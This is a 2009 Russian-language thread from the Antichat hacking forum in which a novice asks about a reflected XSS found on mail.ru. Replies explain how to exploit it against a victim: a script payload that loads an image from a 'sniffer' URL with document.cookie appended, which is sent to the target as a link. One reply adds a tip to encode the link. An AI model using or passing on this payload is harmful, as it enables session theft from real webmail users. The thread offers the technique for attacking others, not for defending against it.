ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

пассивная xss на mail.ru, вопрос
  #1  
Старый 08.03.2009, 03:02
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
Smile пассивная xss на mail.ru, вопрос

Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?

 
Ответить с цитированием

  #2  
Старый 08.03.2009, 03:10
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

>>Так, что это кто нить знает ?
пасвная XSS
 
Ответить с цитированием

  #3  
Старый 08.03.2009, 03:21
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
По умолчанию

Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?
 
Ответить с цитированием

  #4  
Старый 08.03.2009, 03:27
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

ты чет напутал!
или скрипт нетот пихнул и незаметил...
То что на картинке - результат действия следуйщего скриптк:
Код:
"><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #5  
Старый 08.03.2009, 03:33
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
По умолчанию

Блин, да ты прав я именно этим скриптом и пробовал.
А через эту уизвимость куки можно пробивать ?
 
Ответить с цитированием

  #6  
Старый 08.03.2009, 03:36
needle
Познающий
Регистрация: 04.11.2008
Сообщений: 31
Провел на форуме:
2284670

Репутация: 16
По умолчанию

просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #7  
Старый 08.03.2009, 03:36
Failure
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893

Репутация: 102
По умолчанию

мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
ну раз спросил то отвечу - да, угнать кукисы можно
 
Ответить с цитированием

  #8  
Старый 08.03.2009, 03:38
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Цитата:
Сообщение от needle  
просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
и что?

она посмотрит на свои куки=///////

ТС
кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
и жди куки)
например что то типа:
'><script>img = new Image();img.src="снифферкартинко"+d ocument.cookie;</script>

Последний раз редактировалось -m0rgan-; 08.03.2009 в 03:42..
 
Ответить с цитированием

  #9  
Старый 08.03.2009, 03:38
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
По умолчанию

Спасибо, я тока учусь ))
 
Ответить с цитированием

  #10  
Старый 08.03.2009, 03:40
[dei]
Участник форума
Регистрация: 24.11.2008
Сообщений: 205
Провел на форуме:
1123418

Репутация: 362
Отправить сообщение для [dei] с помощью ICQ
По умолчанию

только закодировать не забудь
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна пассивная XSS на mail.ru LeopardSS Разное - Покупка, продажа, обмен 4 08.02.2009 19:34
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ